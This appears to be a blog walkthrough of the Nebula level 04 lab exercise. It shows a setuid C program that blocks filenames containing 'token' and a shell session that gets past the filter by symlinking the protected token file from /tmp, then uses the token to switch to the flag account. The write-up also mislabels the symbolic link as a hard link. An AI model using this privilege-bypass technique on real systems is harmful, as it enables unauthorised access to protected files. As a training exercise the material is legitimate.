Exploit Exercises: Nebula Level 04

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));

  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

Solution

After login we go to the flag account folder.

level04@nebula:~$ cd /home/flag04/
level04@nebula:/home/flag04$ ls -al
total 13
drwxr-x--- 2 flag04 level04   93 Nov 20  2011 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
-rw-r--r-- 1 flag04 flag04   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag04 flag04  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag04 flag04   675 May 18  2011 .profile
-rwsr-x--- 1 flag04 level04 7428 Nov 20  2011 flag04
-rw------- 1 flag04 flag04    37 Nov 20  2011 token
level04@nebula:/home/flag04$

Hmm, let’s get more info by trying some basic commands.

level04@nebula:/home/flag04$ ls -al
total 13
drwxr-x--- 2 flag04 level04   93 Nov 20  2011 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
-rw-r--r-- 1 flag04 flag04   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag04 flag04  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag04 flag04   675 May 18  2011 .profile
-rwsr-x--- 1 flag04 level04 7428 Nov 20  2011 flag04
-rw------- 1 flag04 flag04    37 Nov 20  2011 token
level04@nebula:/home/flag04$ file flag04
flag04: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]
level04@nebula:/home/flag04$ cat token
cat: token: Permission denied
level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'
level04@nebula:/home/flag04$

Permission denied. Really? Nope. Where do we control everything as any user? Well …​ In /tmp/ folder and as we did in previous tutorials hard link are hard link!

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -la /tmp
total 0
drwxrwxrwt 4 root    root    100 Oct 16 13:18 .
drwxr-xr-x 1 root    root    220 Oct 16  2017 ..
drwxrwxrwt 2 root    root     40 Oct 16  2017 .ICE-unix
drwxrwxrwt 2 root    root     40 Oct 16  2017 .X11-unix
lrwxrwxrwx 1 level04 level04  18 Oct 16 13:17 level04 -> /home/flag04/token
level04@nebula:/home/flag04$

That funny moment when you see the “lrwxrwxrwx” as permission for your hard link. Let’s end this.

level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$

Now keep in mind that tokens in this exploit tutorial are used as passwords for the flag account.

level04@nebula:/home/flag04$ su flag04
Password:
sh-4.2$ id
uid=995(flag04) gid=995(flag04) groups=995(flag04)
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$

See you in the next tutorial. Share, Like and ask!